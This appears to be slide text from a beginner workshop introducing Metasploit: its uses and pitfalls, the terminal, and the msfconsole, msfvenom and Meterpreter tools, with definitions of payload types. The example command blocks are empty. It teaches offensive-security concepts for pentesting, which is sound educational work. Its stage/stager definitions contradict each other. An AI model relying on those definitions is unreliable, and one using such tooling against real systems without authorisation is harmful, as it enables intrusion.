Metasploit
What is Metasploit?
- Offensive security automation tool
- fully open source
- tries to guarantee reliability and trustworthiness of exploits
- roughly the same age as Aaron and Max
- targeted towards red teamers/pentesters
Pitfalls
- Limited real-world utility
- bad reputation due to abuse by script kiddies
- mostly written in Ruby
- it can be quite slow
How it can be useful
- As part of pentests that are fully automated
- when used with automation tools such as Pymetasploit3
- particularly useful for remote code execution attacks that are widely exploitable
How it works
- A git repo full of Python/Ruby scripts that are organised into folders
- set a couple of options interactively and then run it
Prerequisite: “The Terminal”
- NOT scary
- NOT complicated
- NOT all the same
| The Terminal | T’Internet |
|---|---|
| terminal prompt | website |
| terminal emulator | web browser |
Like a website, you can navigate between terminal prompts
Demo
|
|
Examples of prompts
- Bash
- Powershell
- Python IDLE
- CMD
Metasploit commands
There are many, but the commands that you will probably need today are:
|
|
msfconsole
The main Metasploit console
msfvenom
A tool for generating payloads.
Meterpreter
A payload that is used to control a compromised system.
AKA a fancy bash shell
Example usage
Finding exploits
|
|
Running an exploit
|
|
Payloads
- Single - A payload that connects back to the attacker and executes in one step.
- Stage - A smaller payload that sets up a connection and downloads a larger payload (the stager).
- Stager - The initial part of a multi-stage payload that establishes a communication channel before the main payload is delivered.
Summary
Metasploit is a useful tool for learning how to exploit vulnerable machines and for doing automated pen tests.